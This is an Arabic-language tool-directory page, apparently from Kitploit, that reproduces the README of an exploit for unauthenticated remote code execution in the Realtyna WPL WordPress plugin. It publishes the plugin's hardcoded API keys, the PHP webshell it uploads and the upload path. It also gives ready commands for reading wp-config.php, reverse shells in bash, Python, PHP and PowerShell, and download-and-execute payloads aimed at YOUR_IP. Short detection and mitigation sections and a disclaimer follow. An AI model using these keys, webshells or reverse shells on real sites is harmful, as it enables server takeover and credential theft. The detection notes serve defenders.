Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-13714 — استغلال ثغرة تنفيذ أوامر عن بُعد (RCE) دون مصادقة في Realtyna WPL < 5.3.0، يرفع قشرة ويب PHP عبر مفتاح API مضمّن ويُنفّذ أوامر نظام اعتباطية. | Kitploit
أدوات/GitHubGitHub/katransefa/cve-2026-13714
الاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقتطوير الحمولات
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

استغلال ثغرة تنفيذ أوامر عن بُعد (RCE) دون مصادقة في Realtyna WPL < 5.3.0، يرفع قشرة ويب PHP عبر مفتاح API مضمّن ويُنفّذ أوامر نظام اعتباطية.

عرض المستودع
منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Realtyna WPL < 5.3.0 - استغلال RCE بدون مصادقة

الوصف

يستهدف هذا الاستغلال ثغرة أمنية حرجة في إصدارات إضافة Realtyna Organic IDX + WPL Real Estate الأقدم من 5.3.0. تستخدم الإضافة بيانات اعتماد مضمّنة (hardcoded) وتسمح برفع ملفات بدون مصادقة، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

تفاصيل الثغرة

  • معرّف CVE: CVE-2026-13714
  • الإصدارات المتأثرة: < 5.3.0
  • النوع: رفع ملفات عشوائي بدون مصادقة يؤدي إلى RCE
  • الباحث: Thom Stackhouse

التفاصيل التقنية

تمتلك الإضافة واجهة API للإدخال/الإخراج مفعّلة افتراضيًا مع بيانات اعتماد مضمّنة:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

لا تتحقق واجهة API من أنواع الملفات، مما يسمح برفع ملفات PHP عشوائية.

التثبيت

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

الأوامر الشائعة

أهداف Linux

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

أهداف Windows

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

الاستخدام المتقدم

قشرة عكسية (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

قشرة عكسية (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

رفع وتنفيذ حمولات مخصصة

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

تدفق الاستغلال

  1. الرفع: يقوم برفع قشرة ويب PHP (<?php system($_GET['c']); ?>)
  2. الموقع: يتم حفظ الملف في wp-content/uploads/WPL/<ID>/shell.php
  3. التنفيذ: تنفيذ الأوامر عبر shell.php?c=COMMAND

الاكتشاف

كيفية اكتشاف الاستغلال

  • تحقق من وجود ملفات مشبوهة في /wp-content/uploads/WPL/*/
  • راقب الطلبات التي تحتوي على المعاملات: wplview=io, wplformat=io, cmd=set_property
  • ابحث عن طلبات API مشبوهة تستخدم بيانات اعتماد مضمّنة

علامات الاختراق

  • ملفات PHP غير متوقعة في أدلة الرفع
  • طلبات ويب غير معتادة تحتوي أوامر نظام
  • مستخدمون إداريون جدد في WordPress
  • ملفات .htaccess معدّلة

التخفيف

الإصلاحات

  1. قم بالتحديث فورًا إلى إصدار WPL Real Estate 5.3.0 أو أحدث
  2. إذا تعذّر التحديث، فعطّل واجهة الإدخال/الإخراج API:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. غيّر بيانات الاعتماد المضمّنة
  4. طبّق التحقق المناسب من أنواع الملفات
  5. قيّد أدلة رفع الملفات

التوصيات الأمنية

  • حافظ على تحديث جميع إضافات WordPress
  • استخدم جدار حماية تطبيقات الويب (WAF)
  • قم بتدقيقات أمنية منتظمة
  • راقب أدلة رفع الملفات
  • عطّل واجهات API غير الضرورية

لقطات الشاشة

استغلال ناجح

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

إخلاء مسؤولية

هذا الاستغلال لأغراض تعليمية واختبارات مصرّح بها فقط. الاستخدام غير المصرّح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها يعد غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.

الاستخدام القانوني

  • استخدمه فقط على الأنظمة التي تملكها
  • استخدمه فقط بإذن كتابي صريح
  • اتبع ممارسات الإفصاح المسؤول
  • أبلغ البائعين بالثغرات

الترخيص

هذا المشروع لأغراض تعليمية فقط. استخدمه على مسؤوليتك الخاصة.

الاعتمادات

  • الباحث الأصلي: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

المراجع

  • صفحة ثغرة WPScan
  • CVE-2026-13714

سجل التغييرات

v1.0 (2026-08-17)

  • الإصدار الأولي
  • رفع ملفات بدون مصادقة
  • تنفيذ التعليمات البرمجية عن بُعد
  • دعم تنفيذ الأوامر

المساهمة

لا تتردد في إرسال المشكلات (issues) وطلبات السحب (pull requests) لاقتراح التحسينات.

الدعم

للمشكلات والأسئلة، يرجى فتح issue على GitHub.


⚠️ تحذير: هذه الأداة مقدمة لأغراض البحث الأمني والتعليم فقط. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.

تنزيل الأداة